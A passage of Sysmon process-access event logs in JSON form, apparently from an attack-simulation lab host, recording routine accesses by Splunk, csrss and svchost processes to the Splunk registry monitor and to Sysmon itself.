Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10EF-5F25-0000-0010DC450500}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10EF-5F25-0000-0010DC450500}","TargetProcessId":"4732","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10EF-5F25-0000-0010DC450500}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10EF-5F25-0000-0010DC450500}","TargetProcessId":"4732","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:27.962\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:27.962","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
